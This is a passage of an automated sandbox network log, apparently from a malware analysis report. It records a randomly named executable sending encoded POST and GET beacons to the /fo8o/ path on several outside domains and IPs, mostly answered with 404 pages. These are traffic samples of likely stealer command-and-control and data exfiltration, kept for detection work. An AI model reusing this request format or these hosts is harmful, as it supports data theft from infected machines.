                                                                                          Data Ascii: UT5tTdKX=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx1Z1zVMy9hM/29PYBkWeg640W82hS5bR+73/p1YxFS0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp0OcE43JWW7NqLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvpqTvXwoZrEGGveh1YUvD1M9uwhS2Djxkp2e8N11pcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyN6NQpjD2Gsu3STmTn34rqvP3gyE99T1zbRN89ecSSpiwgrnQGzxJxojkTHtDvbDPc2mGlo/980AbVDdw2V4nCfsT9slapAKaq7EEGSeL5i5bH26IQFj/h5ste+eT38btOkmrSX2Uhvlx7+D+TUFcb0rOFOgx6pWk/tKyNXB3rpiYyOR3CiXEqvkhsCKuR2XyVnr3LLe3yV8xHwOTAsZlk9Nr/Hv2Em+zLzYgGBbMENFa0u3f1ylUJeHH8+xGvGM590iI5Uth1I3mxhoJAWDEtppY9LEAiRV+61TFKzUpnM/NRdGOhW5gQEEIRQerBC2R6JTJSEhRMdJ2qTrSzwMCv6VK/n9JXBnu0IG5JtM4G4aYE6Gxt6X1aPY/iCWvNrPXZ4pqgS5iXxHEzdRdodsc9HffbWjYC+3vYu6i5JjkxnT4vfwdN4eDxFbB6sazM4ctju758/LnwlpcqPUKQL9J0uN1KUOJXUXxOtQEXmVLwJAtDjqkYSHfXcx//o/Hx0FG1qN10o4BtUTVz [TRUNCATED]
                                                                                          Dec 19, 2024 07:53:08.604063034 CET637INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 19 Dec 2024 06:53:08 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 493
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          16192.168.2.54999266.29.149.46805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:53:10.012969017 CET524OUTGET /fo8o/?UT5tTdKX=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&sLRH=86fTArmPbL HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Host: www.techchains.info
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Dec 19, 2024 07:53:11.238378048 CET652INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 19 Dec 2024 06:53:11 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 493
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          17192.168.2.549993195.110.124.133805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:53:17.246478081 CET804OUTPOST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.elettrosistemista.zip
                                                                                          Origin: http://www.elettrosistemista.zip
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 209
                                                                                          Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 53 30 5a 7a 49 56 54 58 76 4b 5a 37 6d 56 63 63 63 59 53 44 52 4c 2b 39 4a 4d 44 5a 2f 48 79 67 4b 62 4b 62 65 45 3d
                                                                                          Data Ascii: UT5tTdKX=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCiS0ZzIVTXvKZ7mVcccYSDRL+9JMDZ/HygKbKbeE=
                                                                                          Dec 19, 2024 07:53:18.555402994 CET367INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 19 Dec 2024 06:53:18 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 203
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          18192.168.2.549994195.110.124.133805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:53:19.906855106 CET824OUTPOST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.elettrosistemista.zip
                                                                                          Origin: http://www.elettrosistemista.zip
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 229
                                                                                          Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 6e 47 74 61 45 30 49 50 6d 62 36 70 4c 36 46 4a 51 39 6c 62 6e 74 6f 38 6a 36 61 62 54 45 79 6f 71 74 6e 42 52 77
                                                                                          Data Ascii: UT5tTdKX=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxnGtaE0IPmb6pL6FJQ9lbnto8j6abTEyoqtnBRw
                                                                                          Dec 19, 2024 07:53:21.215508938 CET367INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 19 Dec 2024 06:53:21 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 203
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          19192.168.2.549995195.110.124.133805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:53:22.633655071 CET1841OUTPOST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.elettrosistemista.zip
                                                                                          Origin: http://www.elettrosistemista.zip
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 1245
                                                                                          Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4e 51 6d 4a 43 66 2f 72 36 30 52 65 49 71 72 39 59 76 57 4b 61 34 34 35 6f 6a 44 76 49 4c 39 54 6f 4b 68 7a 2b 48 2b 32 33 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 4f 32 53 7a 58 78 48 55 52 70 76 65 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a [TRUNCATED]
                                                                                          Data Ascii: UT5tTdKX=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWNQmJCf/r60ReIqr9YvWKa445ojDvIL9ToKhz+H+23Z5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EO2SzXxHURpveCufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adMKOJWb586q0++bqb0hnKbeHTSSOaeXEfwuVRmO72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQ4K9J+v++n+MLZPtINn7STocl2A3Ct0TVuxuY+wgnsJMFRG6tA1RxuVLLvV1AnZhNx1HNnssc7WE/yLrcWMbUzBHXPc1kNCaBFFnx1U97uOS5kDZbbXMP2pDR6ux3gwd0AagBpgRl442rnmHx75cXU3eHxJswxungZDTNQUv505kKZxzw80dtlHOLk/pB/gRWWcZyZbk4ZdNQgs0BmrEzW8TVxt2k82jaSmoGnYjN9XoLQoV1V3MLEI+nuki6gSo2cPk1fxAh9p0o2ralwtZD0t//uTMCXDbrg8fVhD0Ly282XddZXUlAbrcOnA4Vo3SKxFUIZP/22/L8OhkvlybwgHCNEEkxzqhuyeOjkETJOhlPkmzcj/nIXmJCv/eM4YwZqaqLiZRh9WHtxfMi1fKrPdWm4edZPAx0FNzhKyMjvpHto3OeOWNpYDhPl3lVs0qQ1YNP/3AFuKWVkfqkP8N6s1Tl+CTchdpVnnfFygV02iAEx8s/ZD01jKVKesA0Wv8lObFdlA1utCJQ [TRUNCATED]
                                                                                          Dec 19, 2024 07:53:24.054831982 CET367INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 19 Dec 2024 06:53:23 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 203
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          20192.168.2.549996195.110.124.133805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:53:25.294100046 CET530OUTGET /fo8o/?sLRH=86fTArmPbL&UT5tTdKX=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Host: www.elettrosistemista.zip
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Dec 19, 2024 07:53:26.602058887 CET367INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 19 Dec 2024 06:53:26 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 203
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          21192.168.2.549997217.196.55.202805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:53:48.739106894 CET792OUTPOST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.empowermedeco.com
                                                                                          Origin: http://www.empowermedeco.com
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 209
                                                                                          Referer: http://www.empowermedeco.com/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 4d 30 71 68 75 2f 53 71 4b 4c 44 43 47 38 4e 50 79 48 34 57 42 74 34 68 7a 43 79 55 71 71 52 6a 37 71 63 30 57 30 3d
                                                                                          Data Ascii: UT5tTdKX=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuM0qhu/SqKLDCG8NPyH4WBt4hzCyUqqRj7qc0W0=
                                                                                          Dec 19, 2024 07:53:49.937742949 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                          Connection: close
                                                                                          content-type: text/html
                                                                                          content-length: 795
                                                                                          date: Thu, 19 Dec 2024 06:53:49 GMT
                                                                                          server: LiteSpeed
                                                                                          location: https://www.empowermedeco.com/fo8o/
                                                                                          platform: hostinger
                                                                                          panel: hpanel
                                                                                          content-security-policy: upgrade-insecure-requests
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
